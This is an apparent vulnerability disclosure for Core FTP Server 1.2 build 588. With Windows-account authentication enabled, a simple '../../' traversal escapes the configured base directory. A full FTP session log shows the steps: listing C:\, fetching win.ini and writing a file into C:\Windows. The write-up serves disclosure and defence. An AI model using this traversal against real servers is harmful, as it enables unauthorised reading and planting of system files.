Configuration
Core FTP Server 1.2 build 588 (32 bit or 64 bit) released on April 7, 2016 was installed. This finding is based on setting the “domain properties” via the GUI so that the “Base directory” is C:\Users\Public
and the authentication method “Enable WinNT users
” is checked. The “Enable WinNT
” authentication method allows the remote user to log in as one of the existing Windows users. No other major settings have been altered. On the server where Core FTP Server is installed, there is a native Windows administrative user cleverly named “admin
” we added.
A Case of Documentation?
The documentation for Core FTP server is fairly minimal, enough to get it configured and working. However, the "Enable WinNT users
" functionality (can see the little check box in the second image at http://www.coreftp.com/server/help/Create_Domain.htm) doesn't come with any warning or explanation as to what that means, other than the content of using the native Windows accounts for authentication. Historically, FTP servers set a 'base directory' much like web servers set 'docroot
', with the intention of that location being the highest up the directory tree one could access. Historical traversal attacks would bypass that limitation allowing access to files and/or directories on the system. Based on the relevant documentation:
http://www.coreftp.com/server/help/help_/GettingStarted.htm
5: Chose a base directory where all directories and user directories will exist.
If you are choosing a networked drive, you may need to modify the account in the Core FTP Server's service properties, as the system account may not have access to the network drive.
http://www.coreftp.com/server/help/Add_account.htm
As a reminder, if you lock a user in their home directory, they will not be able to access virtual paths.
However, locking a user in the home directory doesn't work with NT Auth. Based on the above, an administrator installing Core FTP may expect that it should limit users to the configured Base Directory and subdirectories only.
Relative Path Traversal
Logging in as "admin" to the target machine when 'Enable WinNT users' is configured, Core FTP Server should probably restrict any user to C:\Users\Public and its subdirectories. However, using a simple traversal (e.g. ../../) via the 'cd
' command, an attacker can traverse directories to see “C:\
”, download files (e.g. win.ini
from C:\Windows), and create files (e.g. “albino_lobster.txt
” to C:\Windows
):
madagascar:~ tenrec$ ftp [email protected]
Connected to 192.168.1.3.
220-Core FTP Server Version 1.2, build 588, 64-bit, installed 0 days ago Unregistered
220-Hello Friend
220
331 password required for admin
Password:
230-Logged on
230
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (192,168,1,3,237,224).
150 Opening ASCII mode data connection
dr-xr-xr-x 1 owner group 0 Jul 14 2009 Capybara
dr-xr-xr-x 1 owner group 0 Jul 14 2009 Downloads
dr-xr-xr-x 1 owner group 0 Jul 14 2009 Music
dr-xr-xr-x 1 owner group 0 Jul 14 2009 Pictures
dr-xr-xr-x 1 owner group 0 Nov 21 2010 Recorded TV
dr-xr-xr-x 1 owner group 0 Jul 14 2009 Warez
226 Transfer Complete
ftp> cd ../../
250 CWD command successful
ftp> pwd
Remote directory: /
ftp> ls
227 Entering Passive Mode (192,168,1,3,237,227).
150 Opening ASCII mode data connection
dr-xr-xrwx 1 owner group 0 Apr 4 12:39 cygwin65
dr-xr-xr-x 1 owner group 0 Apr 18 10:30 Program Files
dr-xr-xr-x 1 owner group 0 Apr 18 13:54 Program Files (x86)
dr-xr-xrwx 1 owner group 0 Apr 18 10:29 Python9000
dr-xr-xr-x 1 owner group 0 Apr 18 14:59 Users
dr-xr-xrwx 1 owner group 0 Apr 18 16:58 Windows
226 Transfer Complete
ftp> cd Windows
250 CWD command successful
ftp> get win.ini
local: win.ini remote: win.ini
227 Entering Passive Mode (192,168,1,3,237,248).
150 RETR command started
403 2.88 MiB/s
226 Transfer Complete
403 bytes received in 00:00 (1.32 MiB/s)
ftp> put albino_lobster.txt
local: albino_lobster.txt remote: albino_lobster.txt
227 Entering Passive Mode (192,168,1,3,238,4).
150 STOR command started
100% |********************************************************************************************************| 4 2.00 KiB/s 00:00 ETA
226 Transfer Complete
4 bytes sent in 00:00 (1.52 KiB/s)
Note that if you log in as a non-administrator, you cannot write to C:\Windows.